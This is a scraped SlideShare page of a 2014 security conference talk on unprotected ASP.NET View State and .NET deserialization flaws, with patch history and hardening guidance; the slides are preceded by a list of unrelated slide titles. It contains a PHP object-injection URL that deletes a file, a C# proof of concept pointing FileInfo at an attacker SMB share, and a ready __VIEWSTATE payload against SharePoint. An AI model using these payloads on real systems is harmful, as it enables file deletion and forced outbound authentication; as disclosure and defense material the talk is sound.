Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 

Recently uploaded (20)

New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 

Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0

  • 1. Application Security Forum - 2014 Western Switzerland 05-06 November 2014 - Y-Parc / Yverdon-les-Bains http://www.appsec-forum.ch Why .NET needs MACs and other serial(-ization) tales Alexandre Herzog CTO / Compass Security Schweiz AG
  • 2. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 2
  • 3. About the tale It’s the story of a simple web app test which ended up uncovering a design issue within the .NET framework. I won’t cover the disclosure process in detail •Not that I don’t want to, but I don’t have time for it •Feel free to come over and discuss this afterwards –Ideally over a glass of wine ;-) 3
  • 4. About its storyteller A native of Vaud, exiled first to Valais, then Wellington (New Zealand) and now Zürich Breaking stuff since 2010 for Compass Security •Previously worked for banks as sysadmin / developer Finished my MAS in Information Security in 2013 •MAS thesis about “Crypto-based security mechanisms in Windows and .NET” Author of several security advisories •And still no Twitter handle (!) 4
  • 5. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 5
  • 6. Once upon a time… September 2012, •during a standard ASP.NET web application assessment…
    <body>
    <form name="aspnetForm" method="post" action="[…]" id="aspnetForm">
    <div>
    <input type="hidden" […] value="" />
    <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
    <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/>
    <input type="hidden" name="__VSTATE" id="__VSTATE" value="[LONG_BASE64_STRING]" />
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" />
    </div> 6
  • 8. Once upon a time…
    protected override object LoadPageStateFromPersistenceMedium() {
        string viewState = Request.Form["__VSTATE"];
        byte[] bytes = Convert.FromBase64String(viewState);
        if (Helper.obterFlagCompressViewState())
            bytes = Compressor.Decompress(bytes);
        LosFormatter formatter = new LosFormatter();
        return formatter.Deserialize(Convert.ToBase64String(bytes));
    }

    protected override void SavePageStateToPersistenceMedium(object viewState) {
        LosFormatter formatter = new LosFormatter();
        StringWriter writer = new StringWriter();
        formatter.Serialize(writer, viewState);
        string viewStateString = writer.ToString();
        byte[] bytes = Convert.FromBase64String(viewStateString);
        if (Helper.obterFlagCompressViewState())
            bytes = Compressor.Compress(bytes);
        x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes));
    } 8
  • 10. Once upon a time… We have •A custom implementation of the __VIEWSTATE field •Its value is stored compressed within __VSTATE •It uses the default LosFormatter object constructor •No Machine Authentication (sic) Code (MAC) is used •The __VIEWSTATE field sent to the client is therefore not integrity-protected –Despite the fact we serialize / deserialize objects… The same applies to regular ASP.NET pages •If property EnableViewStateMac is disabled (enabled by default) 10
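The persister on slide 8 can be kept while closing the hole, because LosFormatter has a constructor that turns the MAC on. The following is an added example, not code from the talk or from the assessed application: it assumes an ASP.NET Web Forms page on the .NET Framework with a configured <machineKey>, session state enabled, and it leaves out the compression wrapper of the original to keep the MAC handling visible. Before the fix, a quick field check is to flip one character in the middle of the __VSTATE value and resubmit: a MAC-protected page fails the request with a View State validation error, an unprotected one happily deserializes the altered blob.

```csharp
using System;
using System.IO;
using System.Web;
using System.Web.UI;

// Added example: a MAC-protected replacement for the custom __VSTATE persister.
// Assumes an ASP.NET Web Forms page (.NET Framework) with <machineKey> configured.
public class HardenedVStatePage : Page
{
    private const string FieldName = "__VSTATE";

    protected override void OnInit(EventArgs e)
    {
        base.OnInit(e);
        // Tie the MAC to the caller's session so a View State captured for one
        // user cannot be replayed by another. Must be set before the state is loaded.
        ViewStateUserKey = Session.SessionID;
    }

    // enableMac = true makes LosFormatter append a MAC computed with the
    // <machineKey> validationKey on Serialize() and verify it on Deserialize()
    // before any object is reconstructed; the modifier is mixed into the key.
    private LosFormatter CreateFormatter()
    {
        return new LosFormatter(true, ViewStateUserKey);
    }

    protected override object LoadPageStateFromPersistenceMedium()
    {
        string raw = Request.Form[FieldName];
        if (string.IsNullOrEmpty(raw))
        {
            return null;
        }
        try
        {
            return CreateFormatter().Deserialize(raw);
        }
        catch (HttpException ex)
        {
            // A MAC mismatch surfaces as an HttpException wrapping a
            // ViewStateException; fail the request instead of continuing.
            throw new HttpException(400, "Invalid or tampered " + FieldName, ex);
        }
    }

    protected override void SavePageStateToPersistenceMedium(object state)
    {
        using (StringWriter writer = new StringWriter())
        {
            CreateFormatter().Serialize(writer, state);
            ClientScript.RegisterHiddenField(FieldName, writer.ToString());
        }
    }
}
```

If the compression step is kept, it has to wrap the string LosFormatter produced (compress after Serialize, decompress before Deserialize), since the formatter only verifies its own output. The same protection for ordinary pages is the default enableViewStateMac="true" in web.config, which should never be switched off.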
  • 11. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 11
  • 12. Tales “Why does .NET need MACs” A View State Contains •2 bytes of header data (ASP.NET 1.1 versus 2.0+) •A tree of serialized objects (View State Bag & Serialized ASP.NET controls of the page) •A (H)MAC ensuring integrity (if configured so – default: enabled) A View State •Can be encrypted •Can be split into blocks of x bytes (__VIEWSTATEFIELDCOUNT & __VIEWSTATEx fields) •Can include user defined values to ensure a unique MAC is generated (Page.ViewStateUserKey property) 12
  • 13. Tales “Why does .NET need MACs” View State handling and lifecycle [Figure: View State lifecycle. Request from the client comes in → Deserialize → ASP.NET deserializes the View State and copies the values back into the controls → Serialize → Response is sent to the client] 13
  • 14. Tales “Why does .NET need MACs” State of the art of hacking View States back then: Trustwave's SpiderLabs Security Advisory TWSL2010-001: Multiplatform View State Tampering Vulnerabilities Published: 2010-02-08 Version: 1.1 SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported. Credit: David Byrne of Trustwave's SpiderLabs The ASP.Net view state is typically stored in a hidden field named "__VIEWSTATE". When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state. 14
  • 16. Tales “Why does .NET need MACs” Inappropriate Microsoft advice back then (Trustwave): 16
  • 17. Tales “Why does .NET need MACs” State of the art of exploiting ASP.NET View State fields without MACs: •Abuse them for XSS •You must have an existing control on the page accepting HTML to inject your payload Back in 2010, Trustwave already identified RCE in Mojarra (Java) View State via Expression Language •Implemented in their “Deface” tool •This attack was presented in MISC magazine #69 17
  • 18. Tales “Why does .NET need MACs” Back to September 2012: so ASP.NET unprotected View State fields can be misused •But “only” for XSS when a few pre-conditions are met •And computing a MAC is bad for performance according to Microsoft articles (or was at least in 2010) Some pages in e.g. SharePoint do not enforce a MAC on the View State •View State on these pages is empty, so you can’t misuse them for XSS 18
  • 19. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 19
  • 20. “Serialization” tales Serialization is known to be an issue in web apps •Potentially user defined content gets deserialized on the server •Depends on the technology and the application’s code •Tool “Deface” targets Apache MyFaces 1.2.8 applications Let’s see a PHP example: 20
  • 21. “Serialization” tales
    class Example1 {
        public $cache_file;
        function __construct() {
            // some PHP code...
        }
        function __destruct() {
            $file = "/var/www/cache/tmp/{$this->cache_file}";
            if (file_exists($file)) @unlink($file);
        }
    }
    // some PHP code...
    $user_data = unserialize($_GET['data']);
    // some PHP code... 21
  • 22. “Serialization” tales Flaw can be exploited with the following link •http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";} When receiving this request, the server •Takes GET parameter “data” and unserializes it •Instantiates an object of class “Example1” •Assigns value “../../index.php” to property “cache_file” •When the script ends, method “__destruct()” of object “Example1” is called, which deletes the file Can the same be done with .NET? 22
  • 24. “Serialization” tales Great research of James Forshaw (Context) Studying (and exploiting) .NET serialization via •IFormatter •XML Serialization •WCF Data Contracts •JSON But not a word about serialization of •View State field •LosFormatter object (limited object serialization) 24
  • 25. “Serialization” tales Awesomeness of James Forshaw’s research •Standard .NET object TempFileCollection deletes files in destructor
    [Serializable]
    public class TempFileCollection {
        private Hashtable files; // Deserialized list of files
        // Other stuff...
        ~TempFileCollection() {
            foreach (string file in files.Keys) {
                File.Delete(file); // Makes sure to delete them when
            }                      // the object is destroyed!
        }
    } 25
  • 26. “Serialization” tales Awesomeness of James Forshaw’s research •Standard .NET object FileInfo triggers SMB requests
    [Serializable]
    public class FileInfo {
        private string FullPath;
        protected FileInfo(SerializationInfo info, StreamingContext context) {
            // Ensures path is canonical
            FullPath = NormalizePath(info.GetString("FullPath"));
        }
    }

    string NormalizePath(string path) {
        string[] parts = path.Split('\\');
        foreach (string part in parts) {
            currPath += "\\" + part;
            if (part[0] == '~') {          // If potential short path,
                GetLongPathName(currPath); // call Windows API
            }
        }
    } 26
  • 27. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 27
  • 28. When the stories come together – My tale What if I can combine the fact I now have •A View State field without integrity protection (resp. MAC) •Known .NET objects having interesting (de)serialization actions If possible, I would be able to e.g. •Delete a file on the server •Get the server to initiate a SMB request to e.g. the attacker’s machine Can I apply it? Can it be done within the few hours left onsite? 28
  • 29. When the stories come together – My tale
    using System;
    using System.IO;
    using System.Text;
    using System.Web.UI;

    // created in a hurry by Alexandre Herzog, csnc.ch, 20.09.2012
    public class ExploitViewstate {
        // Caution: both files must be the same length!
        static String bugusFile = @"\\ATTACKER\~test\text.txt";
        static String dummyFile = @"c:\testCompass\testVS.txt";

        public static void Main(string[] args) {
            String validViewstate = GenerateValidViewstate();
            Console.WriteLine("Valid viewstate: {0}", validViewstate);
        }

        private static String GenerateValidViewstate() {
            FileInfo fi = new FileInfo(dummyFile);
            LosFormatter los = new LosFormatter();
            using (StringWriter sw = new StringWriter()) {
                los.Serialize(sw, fi);
                return sw.ToString();
            }
        }
    } 29
  • 30. When the stories come together – My tale
    C:\>set csc=c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    C:\>%csc% exploitViewstate.cs && exploitViewstate.exe
    Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.4927
    for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727
    Copyright (C) Microsoft Corporation 2001-2005. All rights reserved.
    Valid View State: /wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs=
    For the PoC, we need to change the file in the above Base64 string from •c:\testCompass\testVS.txt to •\\ATTACKER\~test\text.txt 30
  • 31. When the stories come together – My tale On an unpatched SharePoint, just send the following request: •http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 31
  • 33. When the stories come together – My tale In the SharePoint logs:
    09/25/2012 17:49:25.68 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Monitoring nasq Medium Entering monitored scope (Request (GET:http://sps:80/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d))
    […]
    09/25/2012 17:49:44.24 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Runtime tkau Unexpected System.InvalidCastException: Unable to cast object of type 'System.IO.FileInfo' to type 'System.Web.UI.Pair'. at System.Web.UI.HiddenFieldPageStatePersister.Load() c263fbf5-6190-481e-8b21-c2cb5d04222b
    Note that the cast to Pair fails only after LosFormatter has already deserialized the FileInfo, i.e. after its deserialization constructor (and the path lookup it triggers) has run. 33
  • 34. When the stories come together – My tale Demo! When the View State MAC is disabled, you can •Delete a file on the server (via object TempFileCollection) •Get the server to initiate a SMB request to e.g. the attacker’s machine (via object FileInfo) •I wasn’t able to get a generic remote code execution (so far) –Highly dependent on the application / content of the server’s GAC –But I heard this week that it’s possible to get RCE and that some smarter people than I have a working exploit… 34
  • 35. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 35
• 36. Time sequence of the (patch) battle
Disclosure milestones
•26.09.2012 Initial contact with MSRC
•19.02.2013 Microsoft aims for a fix in SharePoint in May
•28.02.2013 Microsoft confirms work is under way for SkyDrive
•15.04.2013 Patch postponed (issues found during tests); MS will issue guidance about the View State MAC
•03.07.2013 Patch again postponed (issues found during tests)
•16.08.2013 Detailed answer about the next steps; BlueHat invitation
•10.09.2013 September’s patch Tuesday with MS13-067 (Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution)
• 37. Time sequence of the (patch) battle
Disclosure milestones (continued)
•06.11.2013 Conference call with Microsoft
•10.12.2013 December’s patch Tuesday with
–MS13-100 (Vulnerabilities in Microsoft SharePoint Server Could Allow RCE)
–MS13-105 (Vulnerabilities in Microsoft Exchange Server Could Allow RCE)
–KB2905247 (Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege)
•11.12.2013 Meeting with several Microsoft people in Seattle
• 38. Time sequence of the (patch) battle
Disclosure milestones (continued)
•05.05.2014 Release of ASP.NET 4.5.2, which forbids disabling the View State MAC
•13.05.2014 May’s patch Tuesday with MS14-022 (SharePoint)
•07.08.2014 Announcement that only the latest (ASP).NET framework will be supported from 2016 onward
•09.09.2014 Release to all customers via Windows Update of the December 2013 patch KB2905247
You are now safe…
… if you install all suggested WU patches
• 39. Time sequence of the (patch) battle
But what was the content of
•MS13-100 / CVE-2013-5059
•MS14-022 / CVE-2014-0251 (?) & CVE-2014-1813 (?)
Microsoft did their homework
•A cross-product, company-wide effort was made to address serialisation / View State issues
•Several additional attack vectors were found and fixed
• 40. Time sequence of the (patch) battle
Extract of MS13-100 (CVE-2013-5059)
•New namespace “Microsoft.Office.Server.Security”
•New internal class SafeSerialization with methods
»IsSafeBinaryFormatterStreamWithAllowList([…])
[…]
»IsSafeBinaryFormatterStreamCommon([…])
•Usage within SharePoint:
• 42. Is the ugly bug really dead?
Yes, if you patch adequately
•No pages in SharePoint should be vulnerable
•No pages in Outlook Web Access should be vulnerable
•Disabling the Viewstate MAC should not be possible anymore with patch KB2905247 installed
This patch securing the Viewstate is controversial
•“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of”
But how is the MAC computed?
•Using the keys defined in <machineKey />
• 44. Is the ugly bug really dead?
Result of an audit searching for static machineKey entries
• 45. Is the ugly bug really dead?
If I have your machineKey…
•… I can generate a valid View State MAC too
•Well, I can also generate a Forms Authentication cookie, among other things…
Issue was formally reported to Microsoft in August 2013
•Microsoft contacted the affected projects
How do you manage your machineKeys?
• 47. The (happy?) end
Ensure your products are patched / unaffected
•SharePoint (MS13-067 & MS13-100)
•Exchange (OWA – MS13-105)
•ASP.NET (KB2905247)
•All your other third-party ASP.NET sites
If you don’t use ASP.NET 4.5.2 yet
•Plan to support this version, as Microsoft will drop support for older versions in 2016
• 48. The (happy?) end
Verify your ASP.NET applications
•Don’t deserialize untrusted documents (e.g. on file uploads)
•Don’t re-implement custom Viewstate-like features
Ensure you manage your machineKeys correctly
•If static keys are defined, manage them as carefully as all your other crypto material
•No copy/paste from the Internet, dedicated keys per environment, …
•Encrypt the sensitive sections of your web.config
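The machineKey question on slide 45 and the three closing rules above (no copy/paste, dedicated keys per environment, encrypt the section) can be turned into an audit over your web.config files. The Python below is an added example, not code from the slides or from the audit the deck mentions. It parses each config, classifies its <machineKey/> as absent, auto-generated, static or encrypted (the configProtectionProvider attribute that aspnet_regiis -pe leaves on a protected section), and raises the findings a reviewer would: static keys stored in cleartext, a non-hex placeholder value, and the same key reused across environments, which lets whoever compromises one environment forge View State MACs and forms-authentication tickets for the others. The five configurations are constructed for the example and the key values are placeholders, not real keys.

```python
"""Audit <machineKey/> settings across a set of web.config files.

Added example, not code from the slides. The configurations are constructed for
the demonstration and the key values are placeholders.
"""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")

# Constructed placeholder keys: prod's keys were copied verbatim to staging.
STATIC_ATTRS = (
    'validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF" '
    'decryptionKey="FEDCBA9876543210FEDCBA9876543210" validation="HMACSHA256" decryption="AES"'
)


def _config(machine_key_attrs):
    return f"<configuration><system.web><machineKey {machine_key_attrs} /></system.web></configuration>"


SAMPLE_CONFIGS = {
    "prod/web.config": _config(STATIC_ATTRS),
    "staging/web.config": _config(STATIC_ATTRS),
    "dev/web.config": _config('validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps"'),
    "intranet/web.config": _config('validationKey="PASTE_KEY_FROM_FORUM_POST_HERE" decryptionKey="AutoGenerate" validation="SHA1"'),
    "legacy/web.config": "<configuration><system.web/></configuration>",
    # Section protected with aspnet_regiis -pe "system.web/machineKey"; ciphertext omitted.
    "vault/web.config": """<configuration><system.web>
  <machineKey configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData xmlns="http://www.w3.org/2001/04/xmlenc#">(ciphertext omitted)</EncryptedData>
  </machineKey>
</system.web></configuration>""",
}


def inspect_machine_key(path, xml_text):
    """Classify one web.config as absent, encrypted, auto or static and list its findings."""
    report = {"file": path, "mode": "absent", "keys": {}, "findings": []}
    node = ET.fromstring(xml_text).find("./system.web/machineKey")
    if node is None:
        return report
    if node.get("configProtectionProvider"):
        report["mode"] = "encrypted"  # keys are not readable from the file, nothing more to check here
        return report
    for attr in ("validationKey", "decryptionKey"):
        value = node.get(attr, "AutoGenerate")
        if value.startswith("AutoGenerate"):
            continue
        report["keys"][attr] = value
        if not HEX_RE.match(value):
            report["findings"].append(f"{attr} is not a hex string: placeholder or copy/paste leftover")
    if report["keys"]:
        report["mode"] = "static"
        report["findings"].append(
            "static keys in cleartext: anyone who can read this file can forge View State MACs "
            "and forms-authentication tickets; encrypt the section"
        )
    else:
        report["mode"] = "auto"
    return report


def audit(configs):
    """Inspect every config, then flag keys that appear in more than one file."""
    reports = {path: inspect_machine_key(path, text) for path, text in configs.items()}
    holders = defaultdict(list)
    for path, rep in reports.items():
        for attr, value in rep["keys"].items():
            holders[(attr, value)].append(path)
    for (attr, _), paths in holders.items():
        if len(paths) > 1:
            for path in paths:
                others = sorted(p for p in paths if p != path)
                reports[path]["findings"].append(
                    f"{attr} shared with {others}: one compromised environment can forge tokens for the others"
                )
    return reports


if __name__ == "__main__":
    for path, rep in audit(SAMPLE_CONFIGS).items():
        print(f"{path}: {rep['mode']}")
        for finding in rep["findings"]:
            print(f"  - {finding}")
```

On the constructed set, prod and staging are reported as static with shared keys, intranet as static with a non-hex placeholder, dev as auto-generated with no findings, legacy as absent and vault as encrypted. Auto-generated keys are only fine for a single server; a web farm needs a static key, which is exactly when the sharing and encryption findings matter.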
• 50. Merci/Thank you!
Contact: alexandre.herzog@csnc.ch
Blog: http://blog.csnc.ch/
LinkedIn: http://ch.linkedin.com/in/alexandreherzog/
G+: https://plus.google.com/u/1/109572456864701444940/
Slides: http://slideshare.net/ASF-WS/presentations
http://appsec-forum.ch
• 51. References
Understanding ASP.NET View State – http://msdn.microsoft.com/en-us/library/ms972976.aspx
Beware of Serialized GUI Objects Bearing Data – https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf
OWASP – PHP Object Injection – https://www.owasp.org/index.php/PHP_Object_Injection
Are you my Type? – https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
Barry Dorrans – Going beyond OWASP (esp. 36:40 to 46:45) – http://vimeo.com/108438465
Moving to the .NET Framework 4.5.2 – http://blogs.msdn.com/b/dotnet/archive/2014/08/07/moving-to-the-net-framework-4-5-2.aspx
Farewell, EnableViewStateMac! – http://blogs.msdn.com/b/webdev/archive/2014/09/09/farewell-enableviewstatemac.aspx